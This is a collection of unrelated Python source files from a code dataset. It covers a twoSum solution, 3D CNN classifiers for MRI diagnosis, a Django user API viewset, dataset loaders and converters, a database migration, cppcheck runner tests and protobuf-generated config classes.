content stringlengths 5 1.05M |
|---|
class Solution:
def twoSum(self, numbers: List[int], target: int) -> List[int]:
# Method 1: hash table: time O(n) space O(n)
cache = {} # key of the number which the idx is finding, value is the idx
for i, num in enumerate(numbers):
if num in cache:
return [cache[num] + 1, i + 1]
cache[target - num] = i
# Method 2: two pointers: time O(n) space O(1)
# left, right = 0, len(numbers) - 1
# while left < right:
# if numbers[left] + numbers[right] == target:
# return left + 1, right + 1
# if numbers[left] + numbers[right] < target:
# left += 1
# else:
# right -= 1 |
import random
def log_normal_value(sigma, mean):
"""
Log normal distribution is an approximation on the 50th percentile
:param sigma: The larger the value, the longer the tail
:param mean: The 50th percentile of latencies
:return: the log normal value
"""
return float(round(random.gauss(mean, sigma)))
def random_value(a, b):
"""
Generates a random number within the range a, b
:param a: random from
:param b: random to
:return: a random value in range
"""
return float(random.randint(a, b))
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from os import path
import os
class ConvLBP(nn.Conv3d):
"""
A 3D convolution layer with fixed binary weights
source: https://github.com/dizcza/lbcnn.pytorch/
"""
def __init__(self, in_channels, out_channels, kernel_size=3, sparsity=0.5):
super().__init__(in_channels, out_channels, kernel_size, padding=1, bias=False)
weights = next(self.parameters())
matrix_proba = torch.FloatTensor(weights.data.shape).fill_(0.5)
binary_weights = torch.bernoulli(matrix_proba) * 2 - 1
mask_inactive = torch.rand(matrix_proba.shape) > sparsity
binary_weights.masked_fill_(mask_inactive, 0)
weights.data = binary_weights
weights.requires_grad = False
class DiagnosisClassifier(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, n_classes=2):
super(DiagnosisClassifier, self).__init__()
self.pool = nn.MaxPool3d(2, 2) # Subsampling
self.conv1 = nn.Conv3d(1, 6, 4)
self.conv2 = nn.Conv3d(6, 16, 4)
self.conv3 = nn.Conv3d(16, 32, 5)
self.fc1 = nn.Linear(32 * 12 * 15 * 12, 10000)
self.fc2 = nn.Linear(10000, 5000)
self.fc3 = nn.Linear(5000, 1000)
self.fc4 = nn.Linear(1000, 200)
self.fc5 = nn.Linear(200, 60)
self.fc6 = nn.Linear(60, n_classes)
def forward(self, x, train=False):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = x.view(-1, 32 * 12 * 15 * 12)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = self.fc6(x)
return x
class BasicGPUClassifier(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, dropout=0.1, n_classes=2, bids=False):
super(BasicGPUClassifier, self).__init__()
self.pool = nn.MaxPool3d(2, 2) # Subsampling
self.pool2 = nn.MaxPool3d(2, 2, padding=1)
self.conv1 = nn.Conv3d(1, 8, 4)
self.conv2 = nn.Conv3d(8, 16, 4)
self.conv3 = nn.Conv3d(16, 32, 5)
self.conv4 = nn.Conv3d(32, 64, 4)
self.fc1 = nn.Linear(64 * 5 * 7 * 5, 5000)
self.fc2 = nn.Linear(5000, 1000)
self.fc3 = nn.Linear(1000, 200)
self.fc4 = nn.Linear(200, 60)
self.fc5 = nn.Linear(60, n_classes)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, train=False):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = self.pool2(F.relu(self.conv4(x)))
x = x.view(-1, 64 * 5 * 7 * 5)
if train:
x = self.dropout(x)
x = F.relu(self.fc1(x))
if train:
x = self.dropout(x)
x = F.relu(self.fc2(x))
if train:
x = self.dropout(x)
x = F.relu(self.fc3(x))
if train:
x = self.dropout(x)
x = F.relu(self.fc4(x))
if train:
x = self.dropout(x)
x = self.fc5(x)
return x
class SimonyanClassifier(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, n_classes=2):
super(SimonyanClassifier, self).__init__()
self.pool = nn.MaxPool3d(2, 2, padding=1) # Subsampling
self.conv1 = nn.Conv3d(1, 8, 3)
self.conv2 = nn.Conv3d(8, 16, 3)
self.conv3 = nn.Conv3d(16, 32, 3)
self.conv4 = nn.Conv3d(32, 32, 3)
self.conv5 = nn.Conv3d(32, 64, 3)
self.conv6 = nn.Conv3d(64, 64, 3)
self.fc1 = nn.Linear(64 * 6 * 7 * 6, 5000)
self.fc2 = nn.Linear(5000, 1000)
self.fc3 = nn.Linear(1000, 200)
self.fc4 = nn.Linear(200, 60)
self.fc5 = nn.Linear(60, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = self.conv2(x)
x = self.pool(F.relu(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = self.pool(x)
x = F.relu(self.conv5(x))
x = F.relu(self.conv6(x))
x = self.pool(x)
x = x.view(-1, 64 * 6 * 7 * 6)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
class SimpleClassifier(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, n_classes=2):
super(SimpleClassifier, self).__init__()
self.pool = nn.MaxPool3d(2, 2) # Subsampling
self.conv1 = nn.Conv3d(1, 8, 4)
self.conv2 = nn.Conv3d(8, 8, 5)
self.conv3 = nn.Conv3d(8, 16, 4)
self.conv4 = nn.Conv3d(16, 16, 5)
self.conv5 = nn.Conv3d(16, 32, 4)
self.conv6 = nn.Conv3d(32, 32, 5)
self.fc1 = nn.Linear(32 * 9 * 12 * 9, 5000)
self.fc2 = nn.Linear(5000, 800)
self.fc3 = nn.Linear(800, 100)
self.fc4 = nn.Linear(100, 10)
self.fc5 = nn.Linear(10, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = self.pool(x)
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = self.pool(x)
x = F.relu(self.conv5(x))
x = F.relu(self.conv6(x))
x = self.pool(x)
x = x.view(-1, 32 * 9 * 12 * 9)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
class SimpleLBP(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, n_classes=2):
super(SimpleLBP, self).__init__()
# Warning: LBP layers have automatically padding = 1
self.pool = nn.MaxPool3d(2, 2) # Subsampling
self.conv1 = ConvLBP(1, 8, 4)
self.conv2 = nn.Conv3d(8, 8, 5)
self.conv3 = ConvLBP(8, 16, 4)
self.conv4 = nn.Conv3d(16, 16, 5)
self.conv5 = ConvLBP(16, 32, 4)
self.conv6 = nn.Conv3d(32, 32, 5)
self.fc1 = nn.Linear(32 * 10 * 13 * 10, 5000)
self.fc2 = nn.Linear(5000, 800)
self.fc3 = nn.Linear(800, 100)
self.fc4 = nn.Linear(100, 10)
self.fc5 = nn.Linear(10, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = self.pool(x)
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = self.pool(x)
x = F.relu(self.conv5(x))
x = F.relu(self.conv6(x))
x = self.pool(x)
x = x.view(-1, 32 * 10 * 13 * 10)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
class SimpleLBCNN(nn.Module):
"""
Classifier for a binary classification task
"""
def __init__(self, n_classes=2):
super(SimpleLBCNN, self).__init__()
self.pool = nn.MaxPool3d(2, 2) # Subsampling
self.conv1 = ConvLBP(1, 8, 6)
self.conv2 = nn.Conv3d(8, 8, 5)
self.conv3 = ConvLBP(8, 32, 6)
self.conv3_1 = nn.Conv3d(32, 16, 1)
self.conv4 = ConvLBP(16, 32, 5)
self.conv4_1 = nn.Conv3d(32, 16, 1)
self.conv5 = ConvLBP(16, 32, 6)
self.conv5_1 = nn.Conv3d(32, 32, 1)
self.conv6 = ConvLBP(32, 32, 5)
self.conv6_1 = nn.Conv3d(32, 32, 1)
self.fc1 = nn.Linear(32 * 10 * 13 * 10, 5000)
self.fc2 = nn.Linear(5000, 800)
self.fc3 = nn.Linear(800, 100)
self.fc4 = nn.Linear(100, 10)
self.fc5 = nn.Linear(10, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = self.pool(x)
x = self.conv3_1(F.relu(self.conv3(x)))
x = self.conv4_1(F.relu(self.conv4(x)))
x = self.pool(x)
x = self.conv5_1(F.relu(self.conv5(x)))
x = self.conv6_1(F.relu(self.conv6(x)))
x = self.pool(x)
x = x.view(-1, 32 * 10 * 13 * 10)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
class LocalBriefNet(nn.Module):
def __init__(self, n_classes=2):
super(LocalBriefNet, self).__init__()
self.pool = nn.MaxPool3d(2, 2)
self.conv5x5 = nn.Conv3d(1, 32, 5)
self.conv3x3 = nn.Conv3d(32, 32, 3)
self.last_conv = nn.Conv3d(32, 2, 3)
self.fc = nn.Linear(2 * 24 * 30 * 24, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv5x5(x))
x = self.pool(x)
x = F.relu(self.conv3x3(x))
x = F.relu(self.conv3x3(x))
x = F.relu(self.conv3x3(x))
x = self.pool(x)
x = F.relu(self.last_conv(x))
x = x.view(-1, 2 * 24 * 30 * 24)
x = self.fc(x)
return x
class LocalBriefNet2(nn.Module):
def __init__(self, n_classes=2):
super(LocalBriefNet2, self).__init__()
self.pool = nn.MaxPool3d(2, 2)
self.conv5x5 = nn.Conv3d(1, 32, 5)
self.conv3x3 = nn.Conv3d(32, 32, 3)
self.last_conv = nn.Conv3d(32, 2, 3)
self.fc = nn.Linear(2 * 23 * 29 * 23, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv5x5(x))
x = F.relu(self.conv3x3(x))
x = self.pool(x)
x = F.relu(self.conv3x3(x))
x = F.relu(self.conv3x3(x))
x = F.relu(self.conv3x3(x))
x = self.pool(x)
x = F.relu(self.last_conv(x))
x = x.view(-1, 2 * 23 * 29 * 23)
x = self.fc(x)
return x
class LocalBriefNet3(nn.Module):
def __init__(self, n_classes=2):
super(LocalBriefNet3, self).__init__()
self.pool = nn.MaxPool3d(2, 2)
self.conv5x5 = nn.Conv3d(1, 32, 5)
self.conv3x3 = nn.Conv3d(32, 32, 3)
self.last_conv = nn.Conv3d(32, 2, 3)
self.fc = nn.Linear(2 * 24 * 30 * 24, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv5x5(x))
x = F.relu(self.conv3x3(x))
x = self.pool(x)
x = F.relu(self.conv3x3(x))
x = F.relu(self.conv3x3(x))
x = self.pool(x)
x = F.relu(self.last_conv(x))
x = x.view(-1, 2 * 24 * 30 * 24)
x = self.fc(x)
return x
class VGG(nn.Module):
def __init__(self, n_classes=2):
super(VGG, self).__init__()
self.pool = nn.MaxPool3d(2, 2)
self.conv1 = nn.Conv3d(1, 32, 3, padding=1)
self.conv2 = nn.Conv3d(32, 64, 3, padding=1)
self.conv3 = nn.Conv3d(64, 128, 3, padding=1)
self.conv4 = nn.Conv3d(128, 128, 3, padding=1)
self.conv5 = nn.Conv3d(128, 256, 3, padding=1)
self.conv6 = nn.Conv3d(256, 256, 3, padding=1)
self.conv7 = nn.Conv3d(256, 32, 1)
self.fc1 = nn.Linear(32 * 3 * 4 * 3, 100)
self.fc2 = nn.Linear(100, n_classes)
def forward(self, x, train=False):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = F.relu(self.conv2(x))
x = self.pool(x)
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = self.pool(x)
x = F.relu(self.conv5(x))
x = F.relu(self.conv6(x))
x = self.pool(x)
x = F.relu(self.conv6(x))
x = F.relu(self.conv6(x))
x = self.pool(x)
x = F.relu(self.conv7(x))
x = x.view(-1, 32 * 3 * 4 * 3)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
if __name__ == '__main__':
from data_loader import MriBrainDataset, BidsMriBrainDataset, ToTensor, GaussianSmoothing
from training_functions import cross_validation
import torchvision
import argparse
parser = argparse.ArgumentParser()
# Mandatory arguments
parser.add_argument("train_path", type=str,
help='path to your list of subjects for training')
parser.add_argument("results_path", type=str,
help="where the outputs are stored")
parser.add_argument("caps_path", type=str,
help="path to your caps folder")
# Network structure
parser.add_argument("--classifier", type=str, default='basic',
help='classifier selected')
parser.add_argument('--n_classes', type=int, default=2,
help='Number of classes in the dataset')
# Dataset management
parser.add_argument('--bids', action='store_true', default=False)
parser.add_argument('--sigma', type=float, default=0,
help='Size of the Gaussian smoothing kernel (preprocessing)')
parser.add_argument('--rescale', type=str, default='crop',
help='Action to rescale the BIDS without deforming the images')
# Training arguments
parser.add_argument("-e", "--epochs", type=int, default=2,
help="number of loops on the whole dataset")
parser.add_argument('-lr', '--learning_rate', type=float, default=1,
help='the learning rate of the optimizer (*0.00005)')
parser.add_argument('-cv', '--cross_validation', type=int, default=10,
help='cross validation parameter')
parser.add_argument('--dropout', '-d', type=float, default=0.5,
help='Dropout rate before FC layers')
parser.add_argument('--batch_size', '-batch', type=int, default=4,
help="The size of the batches to train the network")
# Managing output
parser.add_argument("-n", "--name", type=str, default='network',
help="name given to the outputs and checkpoints of the parameters")
parser.add_argument("-save", "--save_interval", type=int, default=1,
help="the number of epochs done between the tests and saving")
# Managing device
parser.add_argument('--gpu', action='store_true', default=False,
help='Uses gpu instead of cpu if cuda is available')
parser.add_argument('--on_cluster', action='store_true', default=False,
help='to work on the cluster of the ICM')
args = parser.parse_args()
if args.gpu and torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
lr = args.learning_rate * 0.00005
results_path = path.join(args.results_path, args.name)
if not path.exists(results_path):
os.makedirs(results_path)
composed = torchvision.transforms.Compose([GaussianSmoothing(sigma=args.sigma), ToTensor(gpu=args.gpu)])
if args.bids:
trainset = BidsMriBrainDataset(args.train_path, args.caps_path, classes=args.n_classes,
transform=composed, rescale=args.rescale)
else:
trainset = MriBrainDataset(args.train_path, args.caps_path, classes=args.n_classes,
transform=composed, on_cluster=args.on_cluster)
if args.classifier == 'basic':
classifier = DiagnosisClassifier(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'simonyan':
classifier = SimonyanClassifier(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'simple':
classifier = SimpleClassifier(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'basicgpu':
classifier = BasicGPUClassifier(n_classes=args.n_classes, dropout=args.dropout).to(device=device)
elif args.classifier == 'simpleLBP':
classifier = SimpleLBP(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'simpleLBCNN':
classifier = SimpleLBCNN(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'localbriefnet':
classifier = LocalBriefNet(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'localbriefnet2':
classifier = LocalBriefNet2(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'localbriefnet3':
classifier = LocalBriefNet3(n_classes=args.n_classes).to(device=device)
elif args.classifier == 'vgg':
classifier = VGG(n_classes=args.n_classes).to(device=device)
else:
raise ValueError('Unknown classifier')
# Initialization
# classifier.apply(weights_init)
# Training
best_params = cross_validation(classifier, trainset, batch_size=args.batch_size, folds=args.cross_validation,
epochs=args.epochs, results_path=results_path, model_name=args.name,
save_interval=args.save_interval, gpu=args.gpu, lr=lr)
|
import logging
from django.utils.translation import gettext_lazy as _
from rest_framework import status
from rest_framework import viewsets
from rest_framework.exceptions import NotFound
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from service import constants
from service.utils import response
from .models import User
from .serializers import UserSerializer
class UserViewSet(viewsets.ModelViewSet):
"""
Retrieve, update or delete a user instance.
"""
queryset = User.objects.all()
serializer_class = UserSerializer
permission_classes = []
pagination_class = LimitOffsetPagination
def create(self, request, *args, **kwargs):
"""
Create a user model instance.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_CREATE_API_INIT, 'user create API initiated'))
serializer = self.get_serializer(data=request.data)
if serializer.is_valid(raise_exception=False):
self.perform_create(serializer)
logging.info('type=%s msg=%s' % (constants.USER_CREATE_API_SUCCESS, 'User created successfully'))
headers = self.get_success_headers(serializer.data)
return response(data=serializer.data, status=status.HTTP_201_CREATED, headers=headers)
logging.error('type=%s msg=%s' % (constants.USER_CREATE_API_ERROR, 'Validation error in user create request'))
return response(errors=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def list(self, request, *args, **kwargs):
"""
List a user queryset.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_LIST_API_INIT, 'User list API initiated'))
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
if page is not None:
logging.debug('type=%s msg=%s' % (constants.USER_LIST_API_WITH_PAGINATION, 'User list with pagination'))
serializer = self.get_serializer(page, many=True)
page_data = self.get_paginated_response(serializer.data)
logging.info('type=%s msg=%s' % (constants.USER_LIST_API_SUCCESS, 'User list fetched successfully'))
return response(data=page_data.data)
logging.debug('type=%s msg=%s' % (constants.USER_LIST_API_WITHOUT_PAGINATION, 'User list without pagination'))
serializer = self.get_serializer(queryset, many=True)
logging.info('type=%s msg=%s' % (constants.USER_LIST_API_SUCCESS, 'User list fetched successfully'))
return response(data=serializer.data)
def __get_object(self):
"""
Retrieve a user model instance.
:return:
"""
try:
return User.objects.get(pk=self.kwargs.get(self.lookup_field))
except User.DoesNotExist:
logging.error('type=%s msg=%s' % (constants.USER_NOT_FOUND, 'User does not exist'))
raise NotFound(_('User does not exist'))
def retrieve(self, request, *args, **kwargs):
"""
Retrieve a user model instance.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_RETRIEVE_API_INIT, 'User retrieve API initiated'))
instance = self.__get_object()
serializer = self.get_serializer(instance)
logging.info('type=%s msg=%s' % (constants.USER_RETRIEVE_API_SUCCESS, 'User detail retrieved successfully'))
return response(data=serializer.data)
def update(self, request, *args, **kwargs):
"""
Update a user model instance.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_UPDATE_API_INIT, 'User update API initiated'))
partial = kwargs.pop('partial', False)
logging.debug('type=%s msg=%s data=%s' % (
constants.USER_UPDATE_API_IS_PARTIAL, 'User request is for with or without partial update',
{'is_partial': partial}))
instance = self.__get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
if serializer.is_valid(raise_exception=False):
self.perform_update(serializer)
logging.info('type=%s msg=%s' % (constants.USER_UPDATE_API_SUCCESS, 'User updated successfully'))
return response(data=serializer.data)
logging.error('type=%s msg=%s' % (constants.USER_UPDATE_API_ERROR, 'Validation error in user update request'))
return response(errors=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def partial_update(self, request, *args, **kwargs):
"""
Partial update a user model instance.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_PARTIAL_UPDATE_API_INIT, 'User partial update API initiated'))
kwargs['partial'] = True
return self.update(request, *args, **kwargs)
def destroy(self, request, *args, **kwargs):
"""
Destroy a user model instance.
:param request:
:param args:
:param kwargs:
:return:
"""
logging.info('type=%s msg=%s' % (constants.USER_DESTROY_API_INIT, 'User destroy API initiated'))
instance = self.__get_object()
self.perform_destroy(instance)
logging.info('type=%s msg=%s' % (constants.USER_DESTROY_API_SUCCESS, 'User deleted successfully'))
return Response(status=status.HTTP_204_NO_CONTENT)
|
import os
import json
from .convert_dataset import convert_dataset
def convert_maestro(input_path, output_path):
info_filename = os.path.join(input_path, "maestro-v1.0.0.json")
with open(info_filename) as file:
info = json.load(file)
for split in ["train", "validation", "test"]:
names = [
sample["audio_filename"][5:-4]
for sample in info
if sample["split"] == split
]
wav_filenames = [
os.path.join(input_path, sample["audio_filename"])
for sample in info
if sample["split"] == split
]
midi_filenames = [
os.path.join(input_path, sample["midi_filename"])
for sample in info
if sample["split"] == split
]
convert_dataset(
os.path.join(output_path, split), names, wav_filenames, midi_filenames,
)
|
file = open('Street_Centrelines.csv')
def tupls():
for line in file:
line = line.split(',')
output1 = (line[2],line[3],line[6],line[7])
print("tuple of STR_NAME,FULL_NAME,FROM_STR,TO_STR is:",output1)
#tupls()
def dictionary():
for line in file:
line = line.split(',')
output2 = zip(line[12],line[0])
print(dict(output2))
#dictionary()
def uOwners():
for line in file:
line = line.split(',')
print(line[11])
#uOwners()
def stClass():
for line in file:
line = line.split(',')
if line[10]=='ARTERIAL':
char = line.join()
print(char)
stClass()
|
import os
import pandas as pd
from torchvision.datasets import ImageFolder
class Imagenette(ImageFolder):
def __init__(self, root, subset='train', csv="noisy_imagenette.csv", **kwargs):
data_path = os.path.join(root, subset)
super().__init__(data_path, **kwargs)
csv_path = os.path.join(root, csv)
ds = pd.read_csv(csv_path)
self.classes = list(set(ds.noisy_labels_0))
self.class_to_idx = {cls: idx for idx, cls in enumerate(self.classes)}
self.imgs = self.get_imgs(root, ds)
def get_imgs(self, root, ds):
return [(os.path.join(root, path), self.class_to_idx[target])
for path, target in zip(ds.path, ds.noisy_labels_0)]
|
from logging import info
import cv2
import numpy as np
import matplotlib.pyplot as plt
from .TabDetectDewarp import detect_bbox, get_dewarped_table
def detect_line(im):
'''
Args:
im (np.array): input image
Returns:
dict:
{
'address_line_1': [left,top,right,bottom]
'address_line_2': [left,top,right,bottom]
'birthday': [left,top,right,bottom]
'hometown_line_1': [left,top,right,bottom]
'hometown_line_2': [left,top,right,bottom]
'id': [left,top,right,bottom]
'name': [left,top,right,bottom]
'nation': [left,top,right,bottom]
'sex': [left,top,right,bottom]
}
'''
info = detect_bbox(im)
return info
if __name__ == '__main__':
im = cv2.imread('')
info = detect_line(im)
print(info) |
# -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
if not db.dry_run:
db.rename_column('key_value', 'system_id', 'obj_id')
def backwards(self, orm):
if not db.dry_run:
db.rename_column('key_value', 'obj_id', 'system_id')
|
import numpy as np
def load_csv_test_data(filename):
with open(filename, 'r') as input_file:
return [[item for item in line.strip().split(',')]
for line in input_file]
def load_csv_data(filename:str) -> np.ndarray:
if not filename.endswith('.csv'):
filename += '.csv'
with open(filename, 'r') as input_file:
return [[int(item) for item in line.strip().split(',')]
for line in input_file]
def load_set_data(filename: str) -> np.ndarray:
with open(filename, 'r') as input_file:
loaded_set = []
for line in input_file:
if line.strip() != '':
tokens = line.strip().split(',')
set_items = np.array(list(map(int, tokens)))
else:
set_items = []
loaded_set.append(set_items)
return np.array(loaded_set)
|
## @file
## `metaL`: homoiconic interpreter engine
## (c) Dmitry Ponyatov <<dponyatov@gmail.com>> 2020 MIT
## * homoiconic interpreter engine
## * in-memory object graph database
## * interactive programming system
from .core import *
from .geo import *
from .gui import *
from .web import *
|
"""Machine Learning Detection metrics for single table datasets."""
from sdmetrics.single_table.detection.sklearn import LogisticDetection, SVCDetection
__all__ = [
'LogisticDetection',
'SVCDetection'
]
|
# Run with nosetests tests/test_cppcheck.py:test_cppcheck
from debile.slave.runners.cppcheck import cppcheck, version
from debile.slave.wrappers.cppcheck import parse_cppcheck
from firehose.model import (Analysis, Generator, Metadata)
import lxml.etree
import unittest
import mock
class CppcheckTestCase(unittest.TestCase):
file_path="tests/resources/libjsoncpp_0.6.0~rc2-3.1.dsc"
firehose_results = Analysis(
metadata=Metadata(
generator=Generator(
name='cppcheck'
),
sut=None,
file_=None,
stats=None),
results=[]
)
@mock.patch('debile.slave.runners.cppcheck.run_command',
return_value=('Cppcheck 1.69', '', 0))
def test_cppcheck_version(self, mock):
name, ver = version()
self.assertEquals(name, 'Cppcheck')
self.assertEquals(ver, '1.69')
@mock.patch('debile.slave.runners.cppcheck.run_command',
return_value=('Cppcheck 1.69', '', 1))
def test_cppcheck_version_with_error(self, mock):
self.assertRaises(Exception, version)
def test_cppcheck(self):
cpp_analysis = cppcheck(self.file_path, self.firehose_results)
xml_content = cpp_analysis[1]
tree = lxml.etree.fromstring(xml_content.encode('utf-16'))
i = 0
paths = []
lines = []
severity = []
messages = []
testid = []
for result in tree.xpath("//results/error"):
paths.append(result.attrib['file'])
lines.append(result.attrib['line'])
severity.append(result.attrib['severity'])
messages.append(result.attrib['msg'])
testid.append(result.attrib['id'])
i += 1
# It think it is safe to say that this number won't be less than 4
self.assertTrue(i > 4)
# Check that some values exist (the order might change)
self.assertTrue("src/lib_json/json_value.cpp" in paths)
self.assertTrue("style" in severity)
self.assertTrue("704" in lines)
self.assertTrue("toomanyconfigs" in testid)
@mock.patch('debile.slave.runners.cppcheck.run_command',
return_value=('', ' ', 0))
def test_cppcheck_with_withespace_in_stderr(self, mock):
cpp_analysis = cppcheck(self.file_path, self.firehose_results)
self.assertEquals(cpp_analysis[0], self.firehose_results)
self.assertEquals(cpp_analysis[1], ' ')
self.assertFalse(cpp_analysis[2])
self.assertIsNone(cpp_analysis[3])
self.assertIsNone(cpp_analysis[4])
def test_cppcheck_wrappers(self):
cpp_analysis = cppcheck(self.file_path, self.firehose_results)
issues = parse_cppcheck(cpp_analysis[1])
i = 0
for issue in issues:
if issue.testid == "toomanyconfigs":
found = issue
i += 1
self.assertEquals(found.testid, "toomanyconfigs")
self.assertEquals(found.location.file.givenpath,
"src/lib_json/json_value.cpp")
self.assertEquals(found.location.point.line, 0)
self.assertEquals(found.location.point.column, 0)
self.assertEquals(found.severity, "style")
self.assertIsNone(found.notes)
self.assertIsNone(found.customfields)
self.assertTrue(i > 4)
|
from .ipn_hand import IPN
from .temporal_transform import *
from .target_transform import *
from .utils import get_dataset_root
INPUT_MEAN = (0.485, 0.456, 0.406)
INPUT_STD = (0.229, 0.224, 0.225)
IPN_HAND_ROOT = get_dataset_root() |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: user_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='user_config.proto',
package='googleapis.artman',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x11user_config.proto\x12\x11googleapis.artman\"l\n\nUserConfig\x12-\n\x05local\x18\x01 \x01(\x0b\x32\x1e.googleapis.artman.LocalConfig\x12/\n\x06github\x18\x02 \x01(\x0b\x32\x1f.googleapis.artman.GitHubConfig\"\x1e\n\x0bLocalConfig\x12\x0f\n\x07toolkit\x18\x01 \x01(\t\"/\n\x0cGitHubConfig\x12\x10\n\x08username\x18\x01 \x01(\t\x12\r\n\x05token\x18\x02 \x01(\tb\x06proto3')
)
_USERCONFIG = _descriptor.Descriptor(
name='UserConfig',
full_name='googleapis.artman.UserConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='local', full_name='googleapis.artman.UserConfig.local', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='github', full_name='googleapis.artman.UserConfig.github', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=40,
serialized_end=148,
)
_LOCALCONFIG = _descriptor.Descriptor(
name='LocalConfig',
full_name='googleapis.artman.LocalConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='toolkit', full_name='googleapis.artman.LocalConfig.toolkit', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=150,
serialized_end=180,
)
_GITHUBCONFIG = _descriptor.Descriptor(
name='GitHubConfig',
full_name='googleapis.artman.GitHubConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='username', full_name='googleapis.artman.GitHubConfig.username', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='token', full_name='googleapis.artman.GitHubConfig.token', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=182,
serialized_end=229,
)
_USERCONFIG.fields_by_name['local'].message_type = _LOCALCONFIG
